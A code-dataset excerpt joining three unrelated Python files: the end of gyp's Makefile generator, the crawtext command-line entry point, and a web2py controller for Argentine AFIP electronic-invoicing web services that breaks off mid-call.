    # an exported assignment ("export foo := a\ b") the backslash reaches
    # the environment as a literal character. So values are deliberately
    # written without escaping spaces.
    self.WriteLn('%s: export %s := %s' % (QuoteSpaces(target), name, value))
def Objectify(self, path):
  """Convert a path to its per-toolset output-directory form."""
  obj_root = '$(obj).%s/$(TARGET)' % self.toolset
  if '$(' in path:
    # Rewrite a generic $(obj)/ reference to the toolset-specific one.
    path = path.replace('$(obj)/', obj_root + '/')
  if '$(obj)' not in path:
    # Plain source-relative path: place it under the object directory.
    path = '%s/%s' % (obj_root, path)
  return path
def Pchify(self, path, lang):
  """Convert a prefix header path to its per-language output directory form."""
  abs_path = self.Absolutify(path)
  pch_root = '$(obj).%s/$(TARGET)/pch-%s' % (self.toolset, lang)
  if '$(' in abs_path:
    # Path already references a make variable: just retarget $(obj)/.
    return abs_path.replace('$(obj)/', pch_root)
  return '%s/%s' % (pch_root, abs_path)
def Absolutify(self, path):
  """Convert a subdirectory-relative path into a base-relative path.
  Skips over paths that contain variables."""
  if '$(' not in path:
    return os.path.normpath(os.path.join(self.path, path))
  # Don't call normpath when the path contains make variables: it might
  # collapse the path too aggressively if it features '..'. However it's
  # still important to strip trailing slashes.
  return path.rstrip('/')
def ExpandInputRoot(self, template, expansion, dirname):
  """Substitute %(INPUT_ROOT)s / %(INPUT_DIRNAME)s placeholders in template.

  Returns the template unchanged when it contains neither placeholder.
  """
  has_placeholder = ('%(INPUT_ROOT)s' in template or
                     '%(INPUT_DIRNAME)s' in template)
  if not has_placeholder:
    return template
  return template % {
      'INPUT_ROOT': expansion,
      'INPUT_DIRNAME': dirname,
  }
def _InstallableTargetInstallPath(self):
  """Returns the location of the final output for an installable target."""
  # Xcode puts shared_library results into PRODUCT_DIR, and some gyp files
  # rely on this. Emulate this behavior for mac.
  # XXX(TooTallNate): disabling this code since we don't want this behavior...
  #if (self.type == 'shared_library' and
  #    (self.flavor != 'mac' or self.toolset != 'target')):
  #  # Install all shared libs into a common directory (per toolset) for
  #  # convenient access with LD_LIBRARY_PATH.
  #  return '$(builddir)/lib.%s/%s' % (self.toolset, self.alias)
  # Every installable product lands directly in the build directory.
  return '$(builddir)/' + self.alias
def WriteAutoRegenerationRule(params, root_makefile, makefile_name,
                              build_files):
  """Write the target to regenerate the Makefile."""
  options = params['options']
  build_files_args = [gyp.common.RelativePath(filename, options.toplevel_dir)
                      for filename in params['build_files_arg']]

  gyp_binary = gyp.common.FixIfRelativePath(params['gyp_binary'],
                                            options.toplevel_dir)
  # Make sure a relative gyp binary is invoked as ./gyp, not found via PATH.
  if not gyp_binary.startswith(os.sep):
    gyp_binary = os.path.join('.', gyp_binary)

  regen_command = gyp.common.EncodePOSIXShellList(
      [gyp_binary, '-fmake'] +
      gyp.RegenerateFlags(options) +
      build_files_args)
  deps = ' '.join(Sourceify(build_file) for build_file in build_files)

  root_makefile.write(
      "quiet_cmd_regen_makefile = ACTION Regenerating $@\n"
      "cmd_regen_makefile = cd $(srcdir); %(cmd)s\n"
      "%(makefile_name)s: %(deps)s\n"
      "\t$(call do_cmd,regen_makefile)\n\n" % {
          'makefile_name': makefile_name,
          'deps': deps,
          'cmd': regen_command,
      })
def PerformBuild(data, configurations, params):
  """Invoke 'make' once per requested configuration (gyp --build support)."""
  options = params['options']
  for config in configurations:
    arguments = ['make']
    # Build from the top-level dir when it isn't the current directory.
    if options.toplevel_dir and options.toplevel_dir != '.':
      arguments += '-C', options.toplevel_dir
    arguments.append('BUILDTYPE=' + config)
    print 'Building [%s]: %s' % (config, arguments)
    # Raises CalledProcessError if make fails, aborting the remaining configs.
    subprocess.check_call(arguments)
def GenerateOutput(target_list, target_dicts, data, params):
  """Generator entry point: write the root Makefile, one .mk per target,
  one sub-Makefile per gyp file, and the auto-regeneration rule."""
  options = params['options']
  flavor = gyp.common.GetFlavor(params)
  generator_flags = params.get('generator_flags', {})
  builddir_name = generator_flags.get('output_dir', 'out')
  android_ndk_version = generator_flags.get('android_ndk_version', None)
  default_target = generator_flags.get('default_target', 'all')

  def CalculateMakefilePath(build_file, base_name):
    """Determine where to write a Makefile for a given gyp file."""
    # Paths in gyp files are relative to the .gyp file, but we want
    # paths relative to the source root for the master makefile. Grab
    # the path of the .gyp file as the base to relativize against.
    # E.g. "foo/bar" when we're constructing targets for "foo/bar/baz.gyp".
    base_path = gyp.common.RelativePath(os.path.dirname(build_file),
                                        options.depth)
    # We write the file in the base_path directory.
    output_file = os.path.join(options.depth, base_path, base_name)
    if options.generator_output:
      output_file = os.path.join(
          options.depth, options.generator_output, base_path, base_name)
    base_path = gyp.common.RelativePath(os.path.dirname(build_file),
                                        options.toplevel_dir)
    return base_path, output_file

  # TODO: search for the first non-'Default' target. This can go
  # away when we add verification that all targets have the
  # necessary configurations.
  default_configuration = None
  toolsets = set([target_dicts[target]['toolset'] for target in target_list])
  for target in target_list:
    spec = target_dicts[target]
    if spec['default_configuration'] != 'Default':
      default_configuration = spec['default_configuration']
      break
  if not default_configuration:
    default_configuration = 'Default'

  srcdir = '.'
  makefile_name = 'Makefile' + options.suffix
  makefile_path = os.path.join(options.toplevel_dir, makefile_name)
  if options.generator_output:
    # NOTE: mutates the module-level srcdir_prefix so per-target writers
    # prefix source paths with $(srcdir)/.
    global srcdir_prefix
    makefile_path = os.path.join(
        options.toplevel_dir, options.generator_output, makefile_name)
    srcdir = gyp.common.RelativePath(srcdir, options.generator_output)
    srcdir_prefix = '$(srcdir)/'

  flock_command= 'flock'
  copy_archive_arguments = '-af'
  # Linux defaults; per-flavor overrides follow.
  header_params = {
      'default_target': default_target,
      'builddir': builddir_name,
      'default_configuration': default_configuration,
      'flock': flock_command,
      'flock_index': 1,
      'link_commands': LINK_COMMANDS_LINUX,
      'extra_commands': '',
      'srcdir': srcdir,
      'copy_archive_args': copy_archive_arguments,
    }
  if flavor == 'mac':
    flock_command = './gyp-mac-tool flock'
    header_params.update({
        'flock': flock_command,
        'flock_index': 2,
        'link_commands': LINK_COMMANDS_MAC,
        'extra_commands': SHARED_HEADER_MAC_COMMANDS,
    })
  elif flavor == 'android':
    header_params.update({
        'link_commands': LINK_COMMANDS_ANDROID,
    })
  elif flavor == 'solaris':
    header_params.update({
        'flock': './gyp-flock-tool flock',
        'flock_index': 2,
    })
  elif flavor == 'freebsd':
    # Note: OpenBSD has sysutils/flock. lockf seems to be FreeBSD specific.
    header_params.update({
        'flock': 'lockf',
    })
  elif flavor == 'openbsd':
    copy_archive_arguments = '-pPRf'
    header_params.update({
        'copy_archive_args': copy_archive_arguments,
    })
  elif flavor == 'aix':
    copy_archive_arguments = '-pPRf'
    header_params.update({
        'copy_archive_args': copy_archive_arguments,
        'link_commands': LINK_COMMANDS_AIX,
        'flock': './gyp-flock-tool flock',
        'flock_index': 2,
    })

  # Toolchain selection: environment variables win over the defaults.
  header_params.update({
      'CC.target':   GetEnvironFallback(('CC_target', 'CC'), '$(CC)'),
      'AR.target':   GetEnvironFallback(('AR_target', 'AR'), '$(AR)'),
      'CXX.target':  GetEnvironFallback(('CXX_target', 'CXX'), '$(CXX)'),
      'LINK.target': GetEnvironFallback(('LINK_target', 'LINK'), '$(LINK)'),
      'CC.host':     GetEnvironFallback(('CC_host', 'CC'), 'gcc'),
      'AR.host':     GetEnvironFallback(('AR_host', 'AR'), 'ar'),
      'CXX.host':    GetEnvironFallback(('CXX_host', 'CXX'), 'g++'),
      'LINK.host':   GetEnvironFallback(('LINK_host', 'LINK'), '$(CXX.host)'),
  })

  build_file, _, _ = gyp.common.ParseQualifiedTarget(target_list[0])
  make_global_settings_array = data[build_file].get('make_global_settings', [])
  wrappers = {}
  for key, value in make_global_settings_array:
    if key.endswith('_wrapper'):
      wrappers[key[:-len('_wrapper')]] = '$(abspath %s)' % value
  make_global_settings = ''
  for key, value in make_global_settings_array:
    if re.match('.*_wrapper', key):
      continue
    if value[0] != '$':
      value = '$(abspath %s)' % value
    wrapper = wrappers.get(key)
    if wrapper:
      value = '%s %s' % (wrapper, value)
      del wrappers[key]
    if key in ('CC', 'CC.host', 'CXX', 'CXX.host'):
      make_global_settings += (
          'ifneq (,$(filter $(origin %s), undefined default))\n' % key)
      # Let gyp-time envvars win over global settings.
      env_key = key.replace('.', '_')  # CC.host -> CC_host
      if env_key in os.environ:
        value = os.environ[env_key]
      make_global_settings += '  %s = %s\n' % (key, value)
      make_global_settings += 'endif\n'
    else:
      make_global_settings += '%s ?= %s\n' % (key, value)
  # TODO(ukai): define cmd when only wrapper is specified in
  # make_global_settings.

  header_params['make_global_settings'] = make_global_settings

  gyp.common.EnsureDirExists(makefile_path)
  root_makefile = open(makefile_path, 'w')
  root_makefile.write(SHARED_HEADER % header_params)
  # Currently any versions have the same effect, but in future the behavior
  # could be different.
  if android_ndk_version:
    root_makefile.write(
        '# Define LOCAL_PATH for build of Android applications.\n'
        'LOCAL_PATH := $(call my-dir)\n'
        '\n')
  for toolset in toolsets:
    root_makefile.write('TOOLSET := %s\n' % toolset)
  WriteRootHeaderSuffixRules(root_makefile)

  # Put build-time support tools next to the root Makefile.
  dest_path = os.path.dirname(makefile_path)
  gyp.common.CopyTool(flavor, dest_path)

  # Find the list of targets that derive from the gyp file(s) being built.
  needed_targets = set()
  for build_file in params['build_files']:
    for target in gyp.common.AllTargets(target_list, target_dicts, build_file):
      needed_targets.add(target)

  build_files = set()
  include_list = set()
  for qualified_target in target_list:
    build_file, target, toolset = gyp.common.ParseQualifiedTarget(
        qualified_target)

    this_make_global_settings = data[build_file].get('make_global_settings', [])
    assert make_global_settings_array == this_make_global_settings, (
        "make_global_settings needs to be the same for all targets. %s vs. %s" %
        (this_make_global_settings, make_global_settings))

    build_files.add(gyp.common.RelativePath(build_file, options.toplevel_dir))
    included_files = data[build_file]['included_files']
    for included_file in included_files:
      # The included_files entries are relative to the dir of the build file
      # that included them, so we have to undo that and then make them relative
      # to the root dir.
      relative_include_file = gyp.common.RelativePath(
          gyp.common.UnrelativePath(included_file, build_file),
          options.toplevel_dir)
      abs_include_file = os.path.abspath(relative_include_file)
      # If the include file is from the ~/.gyp dir, we should use absolute path
      # so that relocating the src dir doesn't break the path.
      if (params['home_dot_gyp'] and
          abs_include_file.startswith(params['home_dot_gyp'])):
        build_files.add(abs_include_file)
      else:
        build_files.add(relative_include_file)

    base_path, output_file = CalculateMakefilePath(build_file,
        target + '.' + toolset + options.suffix + '.mk')

    spec = target_dicts[qualified_target]
    configs = spec['configurations']

    if flavor == 'mac':
      gyp.xcode_emulation.MergeGlobalXcodeSettingsToSpec(data[build_file], spec)

    writer = MakefileWriter(generator_flags, flavor)
    writer.Write(qualified_target, base_path, output_file, spec, configs,
                 part_of_all=qualified_target in needed_targets)

    # Our root_makefile lives at the source root. Compute the relative path
    # from there to the output_file for including.
    mkfile_rel_path = gyp.common.RelativePath(output_file,
                                              os.path.dirname(makefile_path))
    include_list.add(mkfile_rel_path)

  # Write out per-gyp (sub-project) Makefiles.
  depth_rel_path = gyp.common.RelativePath(options.depth, os.getcwd())
  for build_file in build_files:
    # The paths in build_files were relativized above, so undo that before
    # testing against the non-relativized items in target_list and before
    # calculating the Makefile path.
    build_file = os.path.join(depth_rel_path, build_file)
    gyp_targets = [target_dicts[target]['target_name'] for target in target_list
                   if target.startswith(build_file) and
                   target in needed_targets]
    # Only generate Makefiles for gyp files with targets.
    if not gyp_targets:
      continue
    base_path, output_file = CalculateMakefilePath(build_file,
        os.path.splitext(os.path.basename(build_file))[0] + '.Makefile')
    makefile_rel_path = gyp.common.RelativePath(os.path.dirname(makefile_path),
                                                os.path.dirname(output_file))
    writer.WriteSubMake(output_file, makefile_rel_path, gyp_targets,
                        builddir_name)

  # Write out the sorted list of includes.
  root_makefile.write('\n')
  for include_file in sorted(include_list):
    # We wrap each .mk include in an if statement so users can tell make to
    # not load a file by setting NO_LOAD. The below make code says, only
    # load the .mk file if the .mk filename doesn't start with a token in
    # NO_LOAD.
    root_makefile.write(
        "ifeq ($(strip $(foreach prefix,$(NO_LOAD),\\\n"
        "    $(findstring $(join ^,$(prefix)),\\\n"
        "                 $(join ^," + include_file + ")))),)\n")
    root_makefile.write("  include " + include_file + "\n")
    root_makefile.write("endif\n")
  root_makefile.write('\n')

  if (not generator_flags.get('standalone')
      and generator_flags.get('auto_regeneration', True)):
    WriteAutoRegenerationRule(params, root_makefile, makefile_name, build_files)

  root_makefile.write(SHARED_FOOTER)

  root_makefile.close()
| mit |
cortext/crawtext | crawtext/__main__.py | 1 | 1752 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Crawtext
Usage:
crawtext
crawtext [<start>|<stop>|<report>|<export>]
crawtext <config> [(--env <env_file>)] [(--project <project_file>)]
Options:
-h --help
--version
"""
__script__ = "crawtext"
__name__ = "crawtext"
__version__ = "6.0.0"
__username__= "c24b"
__email__= "4barbes@gmail.com"
__author__= "Constance de Quatrebarbes"
import sys
if __name__ == "crawtext":
    from docopt import docopt
    from crawler import Crawler

    arguments = docopt(__doc__, version=__version__)
    # Keep only the options/commands actually supplied on the command line.
    options = {k: v for k, v in arguments.items()
               if v is not None and v is not False and type(v) != list}
    if len(options) == 0:
        # No command given: run the crawler with the stored configuration.
        c = Crawler()
        status = c.start()
        sys.exit(status)
    else:
        # BUG FIX: the original code did
        #     action = options.keys()
        #     if len(action) == 0:
        #         action = action[0]
        # The condition is inverted (and unreachable here, since options is
        # non-empty), so `action` stayed a list and every string comparison
        # below failed, making every invocation end in the error exit.
        # Select the command key explicitly instead; this also copes with
        # <config> being accompanied by --env/--project options.
        action = None
        for command in ("<start>", "<stop>", "<report>", "<export>", "<config>"):
            if command in options:
                action = command
                break
        if action == "<start>":
            c = Crawler()
            status = c.start()
            sys.exit(status)
        elif action == "<stop>":
            c = Crawler()
            status = c.stop()
            sys.exit(status)
        elif action == "<report>":
            c = Crawler()
            status = c.report()
            sys.exit(status)
        elif action == "<export>":
            c = Crawler()
            status = c.export()
            sys.exit(status)
        elif action == "<config>":
            c = Crawler(project=arguments['<project_file>'],
                        env=arguments['<env_file>'])
            sys.exit(c.status)
        else:
            sys.exit("Error on calling crawtext")
AndresVillan/pyafipws.web2py-app | controllers/servicios_web.py | 12 | 49408 | # -*- coding: utf-8 -*-
def moneyornone(obj):
    """Format *obj* as a two-decimal money string, or None when it cannot
    be interpreted as a number (e.g. None or a non-numeric string)."""
    try:
        return "%.2f" % float(obj)
    except (TypeError, ValueError):
        return None
def utftolatin(text):
    """Re-encode a UTF-8 byte string as Latin-1 (Python 2 ``str``)."""
    # Decode the UTF-8 bytes first, then emit Latin-1 bytes.
    decoded = unicode(text, "utf-8")
    return decoded.encode("latin-1")
# Page title used by the web2py layout for every action in this controller.
response.title = "Servicios Web AFIP"
from xml.parsers.expat import ExpatError
from urllib2 import HTTPError
import os, os.path, time, datetime
# Connection to the web service (SOAP client + AFIP authentication helper):
try:
    from pysimplesoap.client import SoapClient, SoapFault
    from pyafipws import wsaa
except ImportError:
    raise Exception("Por favor instale las librerías pysimplesoap y pyafipws en la carpeta site-packages.")
# Folder where certificates and cached access tickets are stored:
PRIVATE_PATH = os.path.join(request.env.web2py_path,'applications',request.application,'private')
# Configuration
# Load the singleton settings record; abort with HTTP 500 if missing.
variables = db(db.variables).select().first()
if not variables: raise HTTP(500, "No se configuró el registro variables")
# Per-user settings record for the logged-in user.
variablesusuario = db(db.variablesusuario.usuario == auth.user_id).select().first()
if not variablesusuario: raise HTTP(500,"No se configuró el registro variables de usuario")
# Taxpayer CUIT used in every AFIP request.
CUIT = variables.cuit
# Certificate/key filenames (stored inside the "private" folder).
CERTIFICATE = variables.certificate
PRIVATE_KEY = variables.private_key
def detalles_bono_fiscal(comprobante):
    """Build the WSBFE ``Items`` payload from every detail row of *comprobante*.

    Returns a list of dicts in the field layout expected by BFEAuthorize.
    """
    rows = db(db.detalle.comprobante == comprobante.id).select()
    return [
        {
            "Pro_codigo_ncm": row.ncm or 0,
            "Pro_codigo_sec": row.sec or 0,
            "Pro_ds": row.ds,
            "Pro_qty": row.qty,
            "Pro_umed": row.umed.cod,
            "Pro_precio_uni": "%.2f" % row.precio,
            "Imp_bonif": "%.2f" % row.bonif,
            "Imp_total": "%.2f" % row.imp_total,
            "Iva_id": row.iva.cod,
        }
        for row in rows
    ]
def calcular_comprobante(comprobante):
    """Recompute and store the invoice totals on the *comprobante* record.

    Fills each detail row's ``imp_iva``/``imp_total`` in memory, then
    aggregates taxed net, exempt, not-taxed, VAT and other-taxes amounts
    into the comprobante.  Returns True on completion.
    """
    detalles = db(db.detalle.comprobante==comprobante.id).select()
    imp_op_ex = 0
    imp_tot_conc = 0
    # Total of "other taxes" (tributos) attached to the invoice.
    try:
        tributos = sum([t.importe for t in db(db.detalletributo.comprobante == comprobante).select()], 0.00)
    except (ValueError, TypeError):
        tributos = 0.00
    # First pass: per-line subtotal (qty * price - discount) and VAT amount.
    for p in range(len(detalles)):
        iva = db(db.iva.id==detalles[p].iva).select().first()
        try:
            parcial_detalle = (detalles[p].qty * detalles[p].precio) - detalles[p].bonif
        except (ValueError, TypeError, KeyError, AttributeError):
            parcial_detalle = 0.0
        if iva.cod in ["1", "2"]:
            # Codes "1" (not taxed) and "2" (exempt) carry no VAT.
            detalles[p].imp_iva = 0.0
            detalles[p].imp_total = parcial_detalle
        else:
            try:
                detalles[p].imp_iva = parcial_detalle * iva.aliquota
                detalles[p].imp_total = detalles[p].imp_iva + parcial_detalle
            except TypeError:
                detalles[p].imp_iva = 0.0
                detalles[p].imp_total = 0.0
    # BUG FIX: the taxed-net sum used ``detalles[p].bonif`` — the *last* row's
    # discount left over from the loop above — for every row; each row must
    # subtract its own discount.
    neto = sum([((detalle.precio * detalle.qty) - detalle.bonif) for detalle in detalles if not (detalle.iva.cod in ["2", "1"])], 0.00)
    imp_op_ex = sum([detalle.imp_total for detalle in detalles if (detalle.iva.cod == "2")], 0.00)
    imp_tot_conc = sum([detalle.imp_total for detalle in detalles if (detalle.iva.cod == "1")], 0.00)
    # Comprobante types 11/12/13 (class C) and 15 do not discriminate VAT.
    if not int(comprobante.tipocbte.cod) in [11, 12, 13, 15]:
        liq = sum([detalle.imp_iva for detalle in detalles], 0.00)
    else:
        liq = 0.0
    total = imp_op_ex + imp_tot_conc + neto + liq + tributos
    comprobante.imp_trib = tributos
    comprobante.imp_total = total
    comprobante.imp_neto = neto
    comprobante.impto_liq = liq
    comprobante.imp_op_ex = imp_op_ex
    comprobante.imp_tot_conc = imp_tot_conc
    return True
def comprobante_sumar_no_gravado(comprobante):
    """Sum the line totals whose VAT code is "1" (not taxed / no gravado)."""
    total = 0.0
    for row in db(db.detalle.comprobante == comprobante).select():
        if row.iva.cod != "1":
            continue
        try:
            total += float(row.imp_total)
        except (AttributeError, KeyError, ValueError, TypeError):
            # Non-numeric amount: ignore this row.
            pass
    return total
def comprobante_sumar_exento(comprobante):
    """Sum the line totals whose VAT code is "2" (exempt / exento)."""
    total = 0.0
    for row in db(db.detalle.comprobante == comprobante).select():
        if row.iva.cod != "2":
            continue
        try:
            total += float(row.imp_total)
        except (AttributeError, KeyError, ValueError, TypeError):
            # Non-numeric amount: ignore this row.
            pass
    return total
def comprobante_sumar_iva(comprobante):
    """Aggregate VAT per rate for an invoice.

    Returns a list of dicts ``{'id': <AFIP VAT code>, 'base_imp': <taxable
    base>, 'importe': <VAT amount>}`` — one entry per distinct VAT rate used
    by the invoice's detail rows.  Zero-amount buckets are dropped, except
    for code "3" (0%), which is always reported.
    """
    alicuotas = set()
    sumas = []
    detalles = db(db.detalle.comprobante == comprobante).select()
    # Collect the distinct VAT-rate ids referenced by the detail rows.
    for detalle in detalles:
        alicuotas.add(detalle.iva.id)
    for alicuota in alicuotas:
        id = ""
        base_imp = 0
        importe = 0
        for detalle in detalles:
            if detalle.iva == alicuota:
                try:
                    # Accumulate taxable base and VAT for this rate.
                    if not id: id = str(detalle.iva.cod)
                    base_imp += detalle.base_imp_iva
                    importe += detalle.imp_iva
                except TypeError:
                    # Row had a non-numeric base/amount: partial sums are kept.
                    """ TODO: manejo de errores en cómputo de ítem. """
                    pass
        if (importe > 0) or (id == "3"):
            sumas.append(dict(id = id, base_imp = base_imp, importe = importe))
    return sumas
# Detect which web service is in use (from the URL args or from the form).
if request.args:
    SERVICE = request.args[0]
elif request.vars:
    SERVICE = request.vars.get('webservice')
else:
    SERVICE = ""
# Credentials are filled in later by the authentication helper.
TOKEN = SIGN = ''
client = None
# Endpoint URLs: production vs. homologation (testing) environments.
if variables.produccion:
    WSDL = {
        'wsfe': None,
        'wsfev1': "https://servicios1.afip.gov.ar/wsfev1/service.asmx?WSDL",
        'wsfex': "https://servicios1.afip.gov.ar/wsfex/service.asmx", # ?WSDL
        'wsbfe': "https://servicios1.afip.gov.ar/wsbfe/service.asmx", # ?WSDL
        'wsmtxca': "https://serviciosjava.afip.gob.ar/wsmtxca/services/MTXCAService?wsdl",
        }
    WSAA_URL = "https://wsaa.afip.gov.ar/ws/services/LoginCms"
else:
    WSDL = {
        'wsfe': "http://wswhomo.afip.gov.ar/wsfe/service.asmx?WSDL",
        'wsfev1': "http://wswhomo.afip.gov.ar/wsfev1/service.asmx?WSDL",
        'wsfex': "http://wswhomo.afip.gov.ar/wsfex/service.asmx?WSDL",
        'wsbfe': "http://wswhomo.afip.gov.ar/wsbfe/service.asmx?WSDL",
        'wsmtxca': "https://fwshomo.afip.gov.ar/wsmtxca/services/MTXCAService?wsdl",
        }
    WSAA_URL = "https://wsaahomo.afip.gov.ar/ws/services/LoginCms"
def ymd2date(vto):
    """Convert an AFIP date string "20101231" into datetime.date(2010, 12, 31)."""
    year, month, day = int(vto[:4]), int(vto[4:6]), int(vto[6:8])
    return datetime.date(year, month, day)
def date2y_m_d(fch):
    """Convert a date object into the "AAAA-MM-DD" string AFIP expects.

    Returns None when *fch* does not support strftime (e.g. None).
    """
    try:
        raw = fch.strftime("%Y%m%d")
    except AttributeError:
        return None
    return "-".join([raw[:4], raw[4:6], raw[6:]])
def y_m_d2date(fch):
    """Inverse of date2y_m_d: parse an AFIP "AAAA-MM-DD" string into a date.

    Returns None when *fch* is None / lacks string methods.
    """
    try:
        compact = fch.replace("-", "")
        return ymd2date(compact)
    except AttributeError:
        return None
def _autenticar(service="wsfe", ttl=60*60*5):
    """Obtain an AFIP access ticket (TA) for *service*; return (token, sign).

    The signed ticket is cached on disk (private/TA-<service>.xml) and is
    renewed only once the cached file is older than *ttl* seconds.
    Raises HTTP 500 for an unknown service name.
    """
    # wsfev1 => wsfe!
    if service not in ("wsfe","wsfev1","wsmtxca","wsfex","wsbfe"):
        raise HTTP(500,"Servicio %s incorrecto" % service)
    # Path of the cached access-ticket file for this service.
    TA = os.path.join(PRIVATE_PATH, "TA-%s.xml" % service)
    # BUG FIX: the original re-assigned ``ttl = 60*60*5`` here, silently
    # discarding any ttl the caller passed; the parameter default already
    # provides that value.
    if not os.path.exists(TA) or os.path.getmtime(TA)+(ttl)<time.time():
        # Ticket missing or stale: request a new authentication.
        cert = os.path.join(PRIVATE_PATH, CERTIFICATE)
        privatekey = os.path.join(PRIVATE_PATH, PRIVATE_KEY)
        # WSAA expects the "wsfe" service name, not the "wsfev1" variant.
        if "wsfev" in service: service = "wsfe"
        # Create the access-ticket request (TRA)...
        tra = wsaa.create_tra(service=service,ttl=ttl)
        # ...sign it with the taxpayer's certificate...
        cms = wsaa.sign_tra(str(tra),str(cert),str(privatekey))
        # ...and call the WSAA web service to obtain the access ticket.
        ta_string = wsaa.call_wsaa(cms,WSAA_URL,trace=False)
        # Cache the ticket on disk for subsequent requests.
        open(TA,"w").write(ta_string)
    # Parse the (possibly cached) ticket and extract TOKEN and SIGN.
    # NOTE: patched library that accepts empty tags.
    from pysimplesoap.simplexml import SimpleXMLElement
    ta_string=open(TA).read()
    ta = SimpleXMLElement(ta_string)
    token = str(ta.credentials.token)
    sign = str(ta.credentials.sign)
    return token, sign
# Funciones expuestas al usuario:
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor'))
def autenticar():
    """Authentication smoke test: obtain a ticket and show truncated credentials."""
    response.subtitle = "Prueba de autenticación (%s)" % SERVICE
    token, sign = _autenticar(SERVICE or 'wsfe')
    # BUG FIX: the original returned the module-level TOKEN/SIGN (still the
    # empty strings set at import time) instead of the credentials just
    # obtained from _autenticar.
    return dict(token=token[:10]+"...", sign=sign[:10]+"...")
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor') or auth.has_membership('invitado'))
def dummy():
    """Query the status of AFIP's servers via the selected service's Dummy call.

    Returns ``dict(result=...)``; on a SOAP fault the raw XML exchange is
    logged to db.xml and the fault is returned instead.
    """
    response.subtitle = "DUMMY: Consulta estado de servidores (%s)" % SERVICE
    try:
        # Each web service exposes its own "dummy"/health-check method.
        if SERVICE=='wsfe':
            result = client.FEDummy()['FEDummyResult']
        elif SERVICE=='wsfev1':
            result = client.FEDummy()['FEDummyResult']
        elif SERVICE=='wsbfe':
            result = client.BFEDummy()['BFEDummyResult']
        elif SERVICE=='wsfex':
            result = client.FEXDummy()['FEXDummyResult']
        elif SERVICE=='wsmtxca':
            result = client.dummy()
        else:
            result = {}
    except SoapFault,sf:
        # Keep the raw request/response pair for later inspection.
        db.xml.insert(request = repr(client.xml_request), response = repr(client.xml_response))
        result = {'fault': repr(sf.faultstring),
                  'xml_request': repr(client.xml_request),
                  'xml_response': repr(client.xml_response),
                  }
    except ExpatError, ee:
        # The SOAP reply could not be parsed as XML.
        result = {"resultado" :"Error en el Cliente SOAP. Formato de respuesta inválido."}
    return dict(result = result)
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor') or auth.has_membership('invitado'))
def ultimo_id():
    """View: query the last AFIP transaction ID used for the selected service."""
    response.subtitle = "Consulta el último ID de transacción utilizado"
    form = SQLFORM.factory(
        Field('webservice', type='string', length=6, default='wsfe',
              requires = IS_IN_SET(WEBSERVICES)),
        )
    result = {}
    if form.accepts(request.vars, session, keepvalues=True):
        # Each service uses a differently named "last id" method and auth dict.
        if SERVICE=='wsfe':
            result = client.FEUltNroRequest(
                argAuth = {'Token': TOKEN, 'Sign' : SIGN, 'cuit' : CUIT},
                )['FEUltNroRequestResult']
        elif SERVICE=='wsfex':
            result = client.FEXGetLast_ID(
                Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,}
                )['FEXGetLast_IDResult']
        elif SERVICE=='wsbfe':
            result = client.BFEGetLast_ID(
                Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,}
                )['BFEGetLast_IDResult']
        elif SERVICE=='wsmtxca':
            # Not implemented for WSMTXCA.
            pass
        else:
            pass
    return {'form': form, 'result': result}
def f_ultimo_id(comprobante):
    """Query the last AFIP transaction ID (no form): returns (raw result, id).

    For 'wsfev1' (and unknown services) returns (None, None) / ({}, None)
    since that service does not use transaction ids.
    """
    result = {}
    valor = None
    if SERVICE=='wsfe':
        result = client.FEUltNroRequest(
            argAuth = {'Token': TOKEN, 'Sign' : SIGN, 'cuit' : CUIT},
            )['FEUltNroRequestResult']
        valor = result['nro']['value']
    elif SERVICE=='wsfex':
        result = client.FEXGetLast_ID(
            Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,}
            )['FEXGetLast_IDResult']
        valor = result["FEXResultGet"]["Id"]
    elif SERVICE=='wsbfe':
        result = client.BFEGetLast_ID(
            Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,}
            )['BFEGetLast_IDResult']
        valor = result["BFEResultGet"]["Id"]
    elif SERVICE=='wsfev1':
        # WSFEv1 has no "last id" concept.
        result, valor = None, None
    else:
        pass
    return (result, valor)
@auth.requires(auth.has_membership('administrador') or auth.has_membership('emisor') or auth.has_membership('invitado'))
def ultimo_numero_comprobante():
    """View: query the last invoice number authorized by AFIP.

    Lets the user pick web service, invoice type and point of sale, then
    dispatches to the matching "last authorized comprobante" method.
    """
    response.subtitle = "Consulta el último número de comprobante autorizado"
    form = SQLFORM.factory(
        Field('webservice', type='string', length=6, default='wsfe',
            requires = IS_IN_SET(WEBSERVICES)),
        Field('tipocbte', type='integer',
            requires=IS_IN_DB(db,db.tipocbte.cod,"%(ds)s")),
        Field('punto_vta', type='integer', default=1,
            requires=IS_NOT_EMPTY()),
        )
    result = {}
    if form.accepts(request.vars, session, keepvalues=True):
        try:
            # Each web service names the query (and its auth dict) differently.
            if SERVICE=='wsfe':
                result = client.FERecuperaLastCMPRequest(
                    argAuth = {'Token': TOKEN, 'Sign' : SIGN, 'cuit' : CUIT},
                    argTCMP={'PtoVta' : form.vars.punto_vta, 'TipoCbte' : form.vars.tipocbte}
                    )['FERecuperaLastCMPRequestResult']
            elif SERVICE=='wsfev1':
                result = client.FECompUltimoAutorizado(
                    Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT},
                    PtoVta=form.vars.punto_vta,
                    CbteTipo=form.vars.tipocbte,
                    )['FECompUltimoAutorizadoResult']
            elif SERVICE=='wsfex':
                result = client.FEXGetLast_CMP(
                    Auth={'Token': TOKEN, 'Sign': SIGN, 'Cuit': CUIT,
                          "Tipo_cbte": form.vars.tipocbte,
                          "Pto_venta": form.vars.punto_vta,}
                    )['FEXGetLast_CMPResult']
            elif SERVICE=='wsbfe':
                result = client.BFEGetLast_CMP(
                    Auth={"Token": TOKEN, "Sign": SIGN, "Cuit": CUIT,
                          "Tipo_cbte": form.vars.tipocbte,
                          "Pto_venta": form.vars.punto_vta})
            elif SERVICE=='wsmtxca':
                # inicializar_y_capturar_execepciones
                result = client.consultarUltimoComprobanteAutorizado(\
                    authRequest = {"token": TOKEN, "sign": SIGN, "cuitRepresentada": CUIT}, consultaUltimoComprobanteAutorizadoRequest = {\
